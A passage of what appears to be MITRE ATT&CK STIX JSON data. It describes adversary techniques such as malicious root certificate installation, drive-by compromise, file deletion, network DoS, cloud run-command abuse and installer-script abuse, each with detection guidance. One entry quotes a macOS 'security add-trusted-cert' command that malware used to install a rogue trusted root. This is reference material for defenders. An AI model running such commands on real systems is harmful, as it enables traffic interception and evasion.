settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Itzik Kotler, SafeBreach", "Travis Smith, Tripwire", "Red Canary", "Matt Graeber, @mattifestation, SpecterOps"], "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Digital Certificate Validation"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1", "created": "2017-05-31T21:31:42.750Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1130", "external_id": "T1130"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/479.html", "external_id": "CAPEC-479"}, {"source_name": "Wikipedia Root Certificate", "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.", "url": "https://en.wikipedia.org/wiki/Root_certificate"}, {"source_name": "Operation Emmental", "description": "Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.", "url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf"}, {"source_name": "Kaspersky Superfish", "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.", "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/"}, {"source_name": "SpectorOps Code Signing Dec 2017", "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"}, {"source_name": "objective-see ay mami 2018", "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.", "url": "https://objective-see.com/blog/blog_0x26.html"}, {"source_name": "Microsoft Sigcheck May 2017", "description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.", "url": "https://docs.microsoft.com/sysinternals/downloads/sigcheck"}, {"source_name": "Tripwire AppUNBlocker", "description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.", "url": "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Data Encrypted", "description": "Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.\n\nOther exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software. \n\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. \n\nNetwork traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. (Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d54416bd-0803-41ca-870a-ce1af7c05638", "created": "2017-05-31T21:30:30.260Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1022", "external_id": "T1022"}, {"source_name": "Zhang 2013", "description": "Zhang, H., Papadopoulos, C., & Massey, D. (2013, April). Detecting encrypted botnet traffic. Retrieved August 19, 2015.", "url": "http://www.netsec.colostate.edu/~zhang/DetectingEncryptedBotnetTraffic.pdf"}, {"source_name": "Wikipedia File Header Signatures", "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", "url": "https://en.wikipedia.org/wiki/List_of_file_signatures"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:11.536Z", "name": "Remote System Discovery", "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["File: File Access", "Process: Process Creation", "Network Traffic: Network Traffic Content", "Network Traffic: Network Traffic Flow"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0846", "external_id": "T0846"}, {"source_name": "Enterprise ATT&CK January 2018", "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17 ", "url": "https://attack.mitre.org/wiki/Technique/T1018"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Engineering Workstation Compromise", "description": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Joe Slowik - Dragos"], "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Engineering Workstation"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0818", "external_id": "T0818"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "File Deletion", "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Walker Johnson"], "x_mitre_deprecated": false, "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "created": "2020-01-31T12:35:36.479Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/004", "external_id": "T1070.004"}, {"source_name": "Microsoft SDelete July 2016", "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.", "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:11.730Z", "name": "Connection Proxy", "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.\n\nThe definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. (Citation: Enterprise ATT&CK January 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Network Traffic: Network Traffic Flow"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0884", "external_id": "T0884"}, {"source_name": "Enterprise ATT&CK January 2018", "description": "Enterprise ATT&CK 2018, January 11 Connection Proxy Retrieved. 2018/05/17 ", "url": "https://attack.mitre.org/wiki/Technique/T1090"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Drive-by Compromise", "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "SaaS"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1189", "external_id": "T1189"}, {"source_name": "Shadowserver Strategic Web Compromise", "description": "Adair, S., Moran, N. (2012, May 15). Cyber Espionage & Strategic Web Compromises \u2013 Trusted Websites Serving Dangerous Results. Retrieved March 13, 2018.", "url": "http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/"}, {"source_name": "Volexity OceanLotus Nov 2017", "description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.", "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Network Denial of Service", "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Yossi Weizman, Azure Defender Research Team", "Vishwas Manral, McAfee"], "x_mitre_detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "created": "2019-04-17T20:23:15.105Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1498", "external_id": "T1498"}, {"source_name": "FireEye OpPoisonedHandover February 2016", "description": "Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong\u2019s Pro-Democracy Movement. Retrieved April 18, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"}, {"source_name": "FSISAC FraudNetDoS September 2012", "description": "FS-ISAC. (2012, September 17). Fraud Alert \u2013 Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.", "url": "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf"}, {"source_name": "Symantec DDoS October 2014", "description": "Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.", "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf"}, {"source_name": "Cisco DoSdetectNetflow", "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-12T03:27:48.171Z", "name": "Cloud Administration Command", "description": "Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment\u2019s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Cisco", "Nichols Jasper", "Jared Wilson", "Caio Silva", "Adrien Bataille", "Anders Vejlby", "Nader Zaveri", "Tamir Yehuda"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7", "created": "2023-03-13T15:26:11.741Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1651", "external_id": "T1651"}, {"source_name": "AWS Systems Manager Run Command", "description": "AWS. (n.d.). AWS Systems Manager Run Command. Retrieved March 13, 2023.", "url": "https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html"}, {"source_name": "MSTIC Nobelium Oct 2021", "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.", "url": "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/"}, {"source_name": "Microsoft Run Command", "description": "Microsoft. (2023, March 10). Run scripts in your VM by using Run Command. Retrieved March 13, 2023.", "url": "https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-28T15:52:44.332Z", "name": "Installer Packages", "description": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)\n\nUsing legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)\n\nDepending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.\n\nFor Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Brandon Dalton @PartyD0lphin", "Rodchenko Aleksandr"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "created": "2022-09-27T18:02:16.026Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/016", "external_id": "T1546.016"}, {"source_name": "Application Bundle Manipulation Brandon Dalton", "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.", "url": "https://redcanary.com/blog/mac-application-bundles/"}, {"source_name": "Debian Manual Maintainer Scripts", "description": "Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.", "url": "https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact"}, {"source_name": "Windows AppleJeus GReAT", "description": "Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.", "url": "https://securelist.com/operation-applejeus/87553/"}, {"source_name": "Microsoft Installation Procedures", "description": "Microsoft. (2021, January 7). Installation Procedure Tables Group. Retrieved December 27, 2023.", "url": "https://learn.microsoft.com/windows/win32/msi/installation-procedure-tables-group"}, {"source_name": "wardle evilquest parti", "description": "Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.", "url": "https://objective-see.com/blog/blog_0x59.html"}, {"source_name": "Installer Package Scripting Rich Trouton", "description": "Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.", "url": "https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf"}], 